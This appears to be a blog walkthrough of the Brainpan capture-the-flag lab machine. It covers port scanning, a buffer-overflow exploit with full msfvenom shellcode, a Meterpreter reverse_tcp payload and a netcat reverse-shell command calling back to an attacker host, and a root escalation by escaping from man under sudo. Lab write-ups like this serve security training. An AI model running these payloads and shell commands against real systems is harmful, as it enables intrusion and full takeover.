piątek, 13 czerwca 2014

PENTEST LAB - BRAINPAN (probably the fastest way)

Hi and welcome! This is "PENTEST LAB" series, featuring "Brainpan" challenge walkthrough. After my success with "Brainpan: 2" challenge (part I and part II) I've decided to look into the first version. I've grabbed file from here. It's configured like the second one and will grab IP address from DHCP.








!!!SPOILER ALERT!!!
 If you want to finish this challenge alone stop reading here.







GOAL: Obtain root on the system.

Challenge accepted!

Like always, let's look for the IP first:
>_ term
 Currently scanning: Finished!   |   Screen View: Unique Hosts                       
                                                                                                                                        
 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 102
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                  
 -----------------------------------------------------------------------------
 192.168.57.1    08:00:27:da:53:b9    01    060   CADMUS COMPUTER SYSTEMS  
 192.168.57.9    08:00:27:13:67:1a    01    042   CADMUS COMPUTER SYSTEMS
Now check open ports:
>_ term
Starting Nmap 6.45 ( http://nmap.org ) at 2014-06-04 15:02 CEST
Nmap scan report for 192.168.57.9
Host is up (0.00022s latency).
Not shown: 11998 closed ports
PORT      STATE SERVICE VERSION
9999/tcp  open  abyss?
10000/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.3)
|_http-title: Site doesn't have a title (text/html).
| ndmp-version:
|_  ERROR: Failed to get host information from server
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port9999-TCP:V=6.45%I=7%D=6/4%Time=538F18D7%P=x86_64-unknown-linux-gnu%
SF:r(NULL,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\
SF:|_\|\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\
SF:x20\x20\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_
SF:\|\x20\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_
SF:\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_
SF:\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x2
SF:0_\|\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x
SF:20\x20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\
SF:x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x
SF:20\x20_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINP
SF:AN\x20_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENT
SF:ER\x20THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:n\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20>>\x20");
MAC Address: 08:00:27:13:67:1A (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.22 ms 192.168.57.9

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.57 seconds

Two ports 9999 and 10000. Looks similar to Brainpan:2. HtppSimpleServer (Python) and custom app. HttpServer hosts image. I've launched dirbuster against it. While dirbuster was working I've checked custom app from 9999.
>_ term
$ nc 192.168.57.9 9999
_|                            _|                                       
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_| 
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                         
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                             

                          >>

A banner with prompt for password. After playing with it for a while I had nothing and went to dirbuster to check its findings. One folder found with some binary inside. I've downloaded it and checked with "file" command. Looks like a windows binary. Running strings against it gave me this:
>_ term
$ strings http10000-brainpan.exe
[^_]
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
[^_]
[get_reply] s = [%s]
[get_reply] copied %d bytes to buffer
shitstorm
_|                            _|                                       
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_| 
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                         
                                            _|
[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                             
                          >>
                          ACCESS DENIED
                          ACCESS GRANTED
[+] initializing winsock...
[!] winsock init failed: %d
done.
[!] could not create socket: %d
[+] server socket created.
[!] bind failed: %d
[+] bind done on port %d
[+] waiting for connections.
[+] received connection.
[+] check is %d
[!] accept failed: %d
[+] cleaning up.

The "shitstorm" caught my attention and I've typed it as password in the custom app.
>_ term
$ nc 192.168.57.9 9999
_|                            _|                                       
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_| 
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                         
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                             

                          >> shitstorm
                          ACCESS GRANTED
Access granted and "Connection closed"...looks like that app is only checking the pass and then closing the connection. That leaves me with only one way inside system...through exploiting that app. What I knew at that point:
  • system is running with one IP: 192.168.57.9
  • two ports are open: 9999 and 10000
  • python SimpleHtppServer on 10000
  • custom app on 9999, running in wine
  • app binary accessible through http server
  • app must be exploited in order to get inside system

I had two choices here, since app is a windows binary I could debug it in windows machine or try with wine and ollydbg in linux. I chose the second option and stayed with Linux. That binary is some kind of server, it opens socket and waits for connections. When connection occurs it reads input and checks whether it equals the magic string and then closes the connection. I've made some tests to check if I can crush it. Indeed, providing very long input crashed the app.

I started with debugging proper working server. There's a method named "get_reply" which is called after accepting connection from user. I set a breakpoint on exit point (instruction RETN and LEAVE) from that method, connected to the server and sent some "aaaa" as input. Below screen showing my data inside memory.

Worth noting is the beginning address of provided data which is 0x0043F600. Going one step further:

ESP is now pointing to the address 0x0043F80C with value 311715EB if we proceed we can see that's the address the program jumps to:

Let's do some calculations: 0xF80C-0xF600=0x20C=524. So providing input longer than 524 chars will break the app. I've created python script for that purpose.
Later I'll use that script for exploitation because I'll probably need a way to send hex (binary) data to the server as my input. Below you can see how app copies 550 bytes to buffer:

Let's check address 0x0043F80C:

it's value has been overwritten with 61's ('a') and app crashed while trying to read memory at address 0x61616161:

What I needed now is the way to execute my code by making app jumping into it. Unfortunately I couldn't provide address at which my variable is stored because there were 0's in it. "\x00" is called null byte and when app reads user input it'll stop at that byte. I've started looking for another way...if you check the last image you will see that, after the jump, ESP points to address 0x0043F810. My data is there so I can write there anything. The only needed thing now is "JMP ESP" somewhere in the app code. I've opened a binary in hte, changed mode to "pe/image", F7 for search, changed mode to "display: regex" and searched for "jmp.+esp". Here's the result:

My payload will need to look like that:
| 524 bytes of garbage | jmp esp address | nop sled (just in case) | shellcode |
I have "notepad.exe" in wine so I created needed code (mind the -b option, with it and "\x00" as value, created code won't have any null bytes which is crucial here):
>_ term
$ msfvenom -p windows/exec CMD=notepad.exe -b "\x00" -f py
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 22 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 230 (iteration=0)
buf =  ""
buf += "\xb8\xeb\x66\xd9\x09\xd9\xce\xd9\x74\x24\xf4\x5e\x33"
buf += "\xc9\xb1\x33\x31\x46\x15\x83\xee\xfc\x03\x46\x11\xe2"
buf += "\x1e\x9a\x31\x80\xe0\x63\xc2\xf3\x69\x86\xf3\x21\x0d"
buf += "\xc2\xa6\xf5\x46\x86\x4a\x7d\x0a\x33\xd8\xf3\x82\x34"
buf += "\x69\xb9\xf4\x7b\x6a\x0f\x38\xd7\xa8\x11\xc4\x2a\xfd"
buf += "\xf1\xf5\xe4\xf0\xf0\x32\x18\xfa\xa1\xeb\x56\xa9\x55"
buf += "\x98\x2b\x72\x57\x4e\x20\xca\x2f\xeb\xf7\xbf\x85\xf2"
buf += "\x27\x6f\x91\xbc\xdf\x1b\xfd\x1c\xe1\xc8\x1d\x60\xa8"
buf += "\x65\xd5\x13\x2b\xac\x27\xdc\x1d\x90\xe4\xe3\x91\x1d"
buf += "\xf4\x24\x15\xfe\x83\x5e\x65\x83\x93\xa5\x17\x5f\x11"
buf += "\x3b\xbf\x14\x81\x9f\x41\xf8\x54\x54\x4d\xb5\x13\x32"
buf += "\x52\x48\xf7\x49\x6e\xc1\xf6\x9d\xe6\x91\xdc\x39\xa2"
buf += "\x42\x7c\x18\x0e\x24\x81\x7a\xf6\x99\x27\xf1\x15\xcd"
buf += "\x5e\x58\x70\x10\xd2\xe7\x3d\x12\xec\xe7\x6d\x7b\xdd"
buf += "\x6c\xe2\xfc\xe2\xa7\x46\xf2\xa8\xe5\xef\x9b\x74\x7c"
buf += "\xb2\xc1\x86\xab\xf1\xff\x04\x59\x8a\xfb\x15\x28\x8f"
buf += "\x40\x92\xc1\xfd\xd9\x77\xe5\x52\xd9\x5d\x8b\x3b\x51"
buf += "\x3b\x23\xa5\xfd\xed\xa6\x5d\x9b\xf1"
and packed everything in to the python script:
I've started the app in ollydbg and lunched the script. Looks good:

I've created another script with windows reverse tcp payload:
>_ term
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.57.1 LPORT=4444 -b "\x00" -f pyNo platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 22 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 314 (iteration=0)
buf =  ""
buf += "\xda\xd3\xd9\x74\x24\xf4\xbf\xf9\x39\xa1\xb0\x5d\x31"
buf += "\xc9\xb1\x48\x31\x7d\x1a\x83\xc5\x04\x03\x7d\x16\xe2"
buf += "\x0c\xc5\x49\x36\xee\x36\x8a\x57\x67\xd3\xbb\x45\x13"
buf += "\x97\xee\x59\x50\xf5\x02\x11\x34\xee\x91\x57\x90\x01"
buf += "\x11\xdd\xc6\x2c\xa2\xd3\xc6\xe3\x60\x75\xba\xf9\xb4"
buf += "\x55\x83\x31\xc9\x94\xc4\x2c\x22\xc4\x9d\x3b\x91\xf9"
buf += "\xaa\x7e\x2a\x71\xe0\x6e\x2a\x66\xb2\x8f\x1b\x39\xc9"
buf += "\xc9\xbb\xbb\x1e\x62\xf2\xa3\x43\x49\x4c\x5f\xb7\x39"
buf += "\x4f\x89\x86\xc2\x61\xf5\x44\xfd\x4d\xf8\x95\x39\x69"
buf += "\xe3\xe0\x31\x89\x9e\xf2\x81\xf3\x44\x77\x14\x53\x0e"
buf += "\x2f\xfc\x65\xc3\xa9\x77\x69\xa8\xbe\xd0\x6e\x2f\x13"
buf += "\x6b\x8a\xa4\x92\xbc\x1a\xfe\xb0\x18\x46\xa4\xd9\x39"
buf += "\x22\x0b\xe6\x5a\x8a\xf4\x42\x10\x39\xe0\xfb\x7b\x56"
buf += "\xc5\xc9\x83\xa6\x41\x5a\xf7\x94\xce\xf0\x9f\x94\x87"
buf += "\xde\x58\xda\xbd\xa6\xf7\x25\x3e\xd6\xde\xe1\x6a\x86"
buf += "\x48\xc3\x12\x4d\x89\xec\xc6\xc1\xd9\x42\xb9\xa1\x89"
buf += "\x22\x69\x49\xc0\xac\x56\x69\xeb\x66\xff\x03\x11\xe1"
buf += "\xc0\x7b\x20\xf0\xa8\x79\x53\xe3\x74\xf4\xb5\x69\x95"
buf += "\x50\x6d\x06\x0c\xf9\xe5\xb7\xd1\xd4\x83\xf8\x5a\xda"
buf += "\x74\xb6\xaa\x97\x66\x2f\x5b\xe2\xd5\xe6\x64\xd9\x70"
buf += "\x07\xf1\xe5\xd2\x50\x6d\xe7\x03\x96\x32\x18\x66\xac"
buf += "\xfb\x8c\xc9\xdb\x03\x40\xca\x1b\x52\x0a\xca\x73\x02"
buf += "\x6e\x99\x66\x4d\xbb\x8d\x3a\xd8\x43\xe4\xef\x4b\x2b"
buf += "\x0a\xc9\xbc\xf4\xf5\x3c\x3d\xc9\x23\x79\xbb\x3b\x46"
buf += "\x69\x07"
started metasploit handler and executed the script:
>_ term
$ python brainploit4.py 192.168.57.9 9999
_|                            _|                                       
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_| 
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                         
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                             

                          >>


>_ term
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.57.1
LHOST => 192.168.57.1
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.57.1:4444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.57.9
[*] Meterpreter session 1 opened (192.168.57.1:4444 -> 192.168.57.9:35643) at 2014-06-13 12:13:26 +0200

meterpreter > ls

Listing: Z:\home\puck
=====================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   0     dir   2013-03-06 21:23:44 +0100  .
40777/rwxrwxrwx   0     dir   2013-03-04 17:49:37 +0100  ..
100666/rw-rw-rw-  0     fil   2013-03-05 21:27:00 +0100  .bash_history
100666/rw-rw-rw-  220   fil   2013-03-04 17:49:37 +0100  .bash_logout
100666/rw-rw-rw-  3637  fil   2013-03-04 17:49:37 +0100  .bashrc
40777/rwxrwxrwx   0     dir   2013-03-04 19:13:51 +0100  .cache
40777/rwxrwxrwx   0     dir   2013-03-04 19:16:33 +0100  .config
100666/rw-rw-rw-  55    fil   2013-03-05 21:25:15 +0100  .lesshst
40777/rwxrwxrwx   0     dir   2013-03-04 19:16:33 +0100  .local
100666/rw-rw-rw-  675   fil   2013-03-04 17:49:37 +0100  .profile
100666/rw-rw-rw-  513   fil   2013-03-06 21:23:43 +0100  checksrv.sh
40777/rwxrwxrwx   0     dir   2013-03-04 20:45:00 +0100  web

meterpreter > pwd
Z:\home\puck
meterpreter > cd /
meterpreter > ls

Listing: Z:\
============

Mode              Size      Type  Last modified              Name
----              ----      ----  -------------              ----
40777/rwxrwxrwx   0         dir   2013-03-04 19:02:15 +0100  bin
40777/rwxrwxrwx   0         dir   2013-03-04 17:19:23 +0100  boot
40777/rwxrwxrwx   0         dir   2014-06-13 14:09:49 +0200  etc
40777/rwxrwxrwx   0         dir   2013-03-04 17:49:37 +0100  home
100666/rw-rw-rw-  15084717  fil   2013-03-04 17:18:57 +0100  initrd.img
100666/rw-rw-rw-  15084717  fil   2013-03-04 17:18:57 +0100  initrd.img.old
40777/rwxrwxrwx   0         dir   2013-03-04 19:04:41 +0100  lib
40777/rwxrwxrwx   0         dir   2013-03-04 16:12:09 +0100  lost+found
40777/rwxrwxrwx   0         dir   2013-03-04 16:12:14 +0100  media
40777/rwxrwxrwx   0         dir   2012-10-09 16:59:43 +0200  mnt
40777/rwxrwxrwx   0         dir   2013-03-04 16:13:47 +0100  opt
40777/rwxrwxrwx   0         dir   2013-03-08 05:07:15 +0100  root
40777/rwxrwxrwx   0         dir   2014-06-13 14:09:53 +0200  run
40777/rwxrwxrwx   0         dir   2013-03-04 17:20:14 +0100  sbin
40777/rwxrwxrwx   0         dir   2012-06-11 16:43:21 +0200  selinux
40777/rwxrwxrwx   0         dir   2013-03-04 16:13:47 +0100  srv
40777/rwxrwxrwx   0         dir   2014-06-13 14:13:01 +0200  tmp
40777/rwxrwxrwx   0         dir   2013-03-04 16:13:47 +0100  usr
40777/rwxrwxrwx   0         dir   2013-03-08 05:13:25 +0100  var
100666/rw-rw-rw-  5180432   fil   2013-02-25 20:32:04 +0100  vmlinuz
100666/rw-rw-rw-  5180432   fil   2013-02-25 20:32:04 +0100  vmlinuz.old

meterpreter >
I've got the connection and meterpreter session. I've checked few things. I was happily surprised when I discovered that I can access linux folders. Unfortunately I couldn't spawn shell so I decided to netcat reverse shell:
>_ term
$ msfvenom -p linux/x86/exec CMD="mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.57.1 4444 >/tmp/f" -b "\x00" -f py
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 22 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 132 (iteration=0)
buf =  ""
buf += "\xd9\xce\xbd\xde\x40\x6e\xf8\xd9\x74\x24\xf4\x58\x29"
buf += "\xc9\xb1\x1b\x31\x68\x18\x03\x68\x18\x83\xe8\x22\xa2"
buf += "\x9b\x92\xd1\x7b\xfd\x31\x83\x13\xd0\xd6\xc2\x03\x42"
buf += "\x36\xa7\xa3\x93\x20\x68\x56\xfd\xde\xff\x75\xaf\xf6"
buf += "\xb9\x79\x50\x07\x28\x11\x36\x6e\xd4\x8a\x96\x5f\x6c"
buf += "\x38\xa7\xb0\xea\xf9\x24\xae\x86\xdd\x85\x44\x0b\x6e"
buf += "\xf5\xc2\xaf\xa1\x6b\x62\x21\x91\x18\x1c\x9d\xc0\xb7"
buf += "\xfc\xef\x24\x6e\xcc\x73\x37\x0d\x0e\xba\xfe\xe3\x60"
buf += "\x8d\x36\x3c\x53\xd8\x01\x12\x9a\x02\x5a\x5e\xe8\x76"
buf += "\x82\xa0\x3f\x02\xaf\xac\x10\x8c\x2f\x1a\x3c\xd9\xd1"
buf += "\x69\x42"
It worked like a charm:
>_ term
$ nc -l -p 4444 -v
nc: listening on :: 4444 ...
nc: listening on 0.0.0.0 4444 ...
nc: connect to 192.168.57.1 4444 from 192.168.57.9 (192.168.57.9) 35644 [35644]
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1002(puck) gid=1002(puck) groups=1002(puck)
$ python -c 'import pty;pty.spawn("/bin/bash");'
puck@brainpan:/home/puck$ ls -la
ls -la
total 48
drwx------ 7 puck puck 4096 Mar  6  2013 .
drwxr-xr-x 5 root root 4096 Mar  4  2013 ..
-rw------- 1 puck puck    0 Mar  5  2013 .bash_history
-rw-r--r-- 1 puck puck  220 Mar  4  2013 .bash_logout
-rw-r--r-- 1 puck puck 3637 Mar  4  2013 .bashrc
drwx------ 3 puck puck 4096 Mar  4  2013 .cache
drwxrwxr-x 3 puck puck 4096 Mar  4  2013 .config
-rw------- 1 puck puck   55 Mar  5  2013 .lesshst
drwxrwxr-x 3 puck puck 4096 Mar  4  2013 .local
-rw-r--r-- 1 puck puck  675 Mar  4  2013 .profile
drwxrwxr-x 4 puck puck 4096 Jun 13 07:41 .wine
-rwxr-xr-x 1 root root  513 Mar  6  2013 checksrv.sh
drwxrwxr-x 3 puck puck 4096 Mar  4  2013 web
puck@brainpan:/home/puck$ cat checksrv.sh
cat checksrv.sh
#!/bin/bash
# run brainpan.exe if it stops
lsof -i:9999
if [[ $? -eq 1 ]]; then
    pid=`ps aux | grep brainpan.exe | grep -v grep`
    if [[ ! -z $pid ]]; then
        kill -9 $pid
        killall wineserver
        killall winedevice.exe
    fi
    /usr/bin/wine /home/puck/web/bin/brainpan.exe &
fi

# run SimpleHTTPServer if it stops
lsof -i:10000
if [[ $? -eq 1 ]]; then
    pid=`ps aux | grep SimpleHTTPServer | grep -v grep`
    if [[ ! -z $pid ]]; then
        kill -9 $pid
    fi
    cd /home/puck/web
    /usr/bin/python -m SimpleHTTPServer 10000
fi
puck@brainpan:/home/puck$
Nothing interesting in user home folder....
>_ term
puck@brainpan:/home/puck$ cd ..
cd ..
puck@brainpan:/home$ ls
ls
anansi  puck  reynard
puck@brainpan:/home$ ls -la
ls -la
total 20
drwxr-xr-x  5 root    root    4096 Mar  4  2013 .
drwxr-xr-x 22 root    root    4096 Mar  4  2013 ..
drwx------  4 anansi  anansi  4096 Mar  4  2013 anansi
drwx------  7 puck    puck    4096 Mar  6  2013 puck
drwx------  3 reynard reynard 4096 Mar  4  2013 reynard

Two more users in the system....
>_ term
puck@brainpan:/home$ cd /opt
cd /opt
puck@brainpan:/opt$ ls
ls
puck@brainpan:/opt$ ls -la
ls -la
total 8
drwxr-xr-x  2 root root 4096 Mar  4  2013 .
drwxr-xr-x 22 root root 4096 Mar  4  2013 ..
puck@brainpan:/opt$ cd /etc
cd /etc
puck@brainpan:/etc$ cat passwd
cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
reynard:x:1000:1000:Reynard,,,:/home/reynard:/bin/bash
anansi:x:1001:1001:Anansi,,,:/home/anansi:/bin/bash
puck:x:1002:1002:Puck,,,:/home/puck:/bin/bash
puck@brainpan:/etc$
one of them is probably admin:
>_ term
puck@brainpan:/etc$ cat group
cat group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:reynard
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:reynard
floppy:x:25:
tape:x:26:
sudo:x:27:reynard
audio:x:29:
dip:x:30:reynard
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:reynard
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
libuuid:x:101:
crontab:x:102:
syslog:x:103:
messagebus:x:104:
fuse:x:105:
mlocate:x:106:
ssh:x:107:
reynard:x:1000:
lpadmin:x:108:reynard
sambashare:x:109:reynard
anansi:x:1001:
puck:x:1002:
winbindd_priv:x:110:
puck@brainpan:/etc$
Looks like there's sudo here :)
>_ term
puck@brainpan:/etc$ ls -la sudoers
ls -la sudoers
-r--r----- 1 root root 843 Mar  4  2013 sudoers
puck@brainpan:/etc$
Can my user use it:
>_ term
puck@brainpan:/etc$ sudo -l
sudo -l
Matching Defaults entries for puck on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User puck may run the following commands on this host:
    (root) NOPASSWD: /home/anansi/bin/anansi_util
puck@brainpan:/etc$
Let's have a look:
>_ term
puck@brainpan:/etc$ sudo /home/anansi/bin/anansi_util
sudo /home/anansi/bin/anansi_util
Usage: /home/anansi/bin/anansi_util [action]
Where [action] is one of:
  - network
  - proclist
  - manual [command]
puck@brainpan:/home/puck$
"manual" option uses "man" command. I can read everything now:
>_ term
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual /etc/sudoers
<udo /home/anansi/bin/anansi_util manual /etc/sudoers                       
/usr/bin/man: manual-/etc/sudoers: No such file or directory
/usr/bin/man: manual_/etc/sudoers: No such file or directory
No manual entry for manual
WARNING: terminal is not fully functional
-  (press RETURN)
#  #  This file MUST be edited with the \u2019visudo\u2019 command as root.
# # Please consider adding local content in  /etc/sudoers.d/  in\u2010
stead  of  #  directly modifying this file.  # # See the man page
for  details  on  how  to  write   a   sudoers   file.    #   De\u2010
faults        env_reset      Defaults        mail_badpass     De\u2010
faults        secure_path="/usr/local/sbin:/usr/lo\u2010
cal/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Host alias specification

# User alias specification

# Cmnd alias specification

#  User  privilege  specification root    ALL=(ALL:ALL) ALL anan\u2010
si  ALL=NOPASSWD:                    /home/anansi/bin/anansi_util
puck    ALL=NOPASSWD:  /home/anansi/bin/anansi_util  # Members of
the admin group may gain root privileges %admin ALL=(ALL) ALL

# Allow members of  group  sudo  to  execute  any  command  #%su\u2010
do  ALL=(ALL:ALL) ALL

# See sudoers(5) for more information on "#include" directives:
 Manual page sudoers line 1 (press h for help or q to quit)q
puck@brainpan:/etc$
I've got some hunch that there's more here than meets the eye. I went through google looking for some tricks with "man" and guess what I have found here:
3. Test commands without leaving the man page. Another cool trick is to use ! if you want to try something you just read in the man page. The best part is that you don't have to close the man page or open another terminal. Type ! and next type the command you want to try. Once finished hit Enter to go back to the man page.
Yes, that's mean I can do:
>_ term
puck@brainpan:/etc$ sudo /home/anansi/bin/anansi_util manual vi
sudo /home/anansi/bin/anansi_util manual vi
No manual entry for manual
WARNING: terminal is not fully functional
-  (press RETURN)
VIM(1)                                                                  VIM(1)

NAME
       vim - Vi IMproved, a programmers text editor

SYNOPSIS
       vim [options] [file ..]
       vim [options] -
       vim [options] -t tag
       vim [options] -q [errorfile]

       ex
       view
       gvim gview evim eview
       rvim rview rgvim rgview

DESCRIPTION
       Vim  is a text editor that is upwards compatible to Vi.  It can be used
       to edit all kinds of plain text.  It is especially useful  for  editing
       programs.

       There  are a lot of enhancements above Vi: multi level undo, multi win\u2010
       dows and buffers, syntax highlighting, command line  editing,  filename
 Manual page vi(1) line 1 (press h for help or q to quit)e
       completion,   on-line   help,   visual  selection,  etc..   See  ":help
       vi_diff.txt" for a summary of the differences between Vim and Vi.
 Manual page vi(1) line 5 (press h for help or q to quit)!/bin/bash
!/bin/bash
root@brainpan:/usr/share/man# id
id
uid=0(root) gid=0(root) groups=0(root)
root@brainpan:/home/puck# whoami
whoami
root
root@brainpan:/home/puck#

and enjoy my new fresh root :) Just so you know...there's another way to gain root but that's a topic for another story.

środa, 11 czerwca 2014

PENTEST LAB - BRAINPAN: 2 (part II: looking for root)

This is part II of the "Pentest Lab" in which I'm presenting my fight with "Brainpan:2". In the first part I've gained access to the machine. Now it's time to gain root. I've logged as user "anansi" using reverse shell spawned from custom app running on port 9999. Let's have a look inside home folder







!!!SPOILER ALERT!!!
 If you want to finish this challenge alone stop reading here.






>_ term
anansi@brainpan2:/opt$ cd /home
cd /home
